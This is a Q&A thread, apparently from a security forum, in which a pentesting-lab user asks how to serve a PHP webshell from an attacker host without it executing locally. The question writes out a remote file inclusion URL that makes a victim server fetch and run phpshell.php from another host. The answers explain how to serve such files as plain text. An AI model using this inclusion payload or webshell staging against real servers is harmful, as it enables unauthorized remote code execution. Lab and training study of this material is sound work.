# Serving a php webshell without running it locally

Tags: php, apache, shellcode, web

I am using Kali Linux in a pentesting lab.

By entering the following URL on the victim system I can get it to access my apache server (I see a 200 access response in my logs), but the php file renders on my system and then I spawn a webshell on my own box:

`https://10.0.0.1/section.php?page=http://10.0.0.2/phpshell.php%00`

How do I ["change the binding" in apache](https://security.stackexchange.com/a/131051/68833) to prevent it from running?
Changing it to a `.txt` seems to prevent it from running on *both* systems; not sure that I can [inject it that way](https://pen-testing.sans.org/blog/2013/05/06/netcat-without-e-no-problem).

Comment: Are you trying to attack 10.0.0.1 by including a file from 10.0.0.2?

Comment: @Sjoerd Yes that is exactly what is being attempted here

Comment: I know which box this is =X

Comment: @Info5ek I stumbled on this while googling for section.php. Your comment is well stated ;)

Comment: Some should "try harder"...

Answer (score 5, accepted):

python -m SimpleHTTPServer 80

will spawn you a simple http server that is not php aware, quickest way imho

Comment: Thanks so much! This server is awesome for simple file hosting out of various directories on the system. Incredibly easy to use and none of the extra Apache fluff.

Answer (score 6):

Use the following setting in your apache config or in a .htaccess file:

```
php_flag engine off
```

See also [Disable PHP in directory (including all sub-directories) with .htaccess](https://stackoverflow.com/questions/1271899/disable-php-in-directory-including-all-sub-directories-with-htaccess).

Comment: Thank you! I wish I could mark two answers - you directly addresed my Apache question, but the SimpleHTTPServer is so straightforward I've got to go with it! Thanks for taking the time to chime in however :) This response is equally relevant.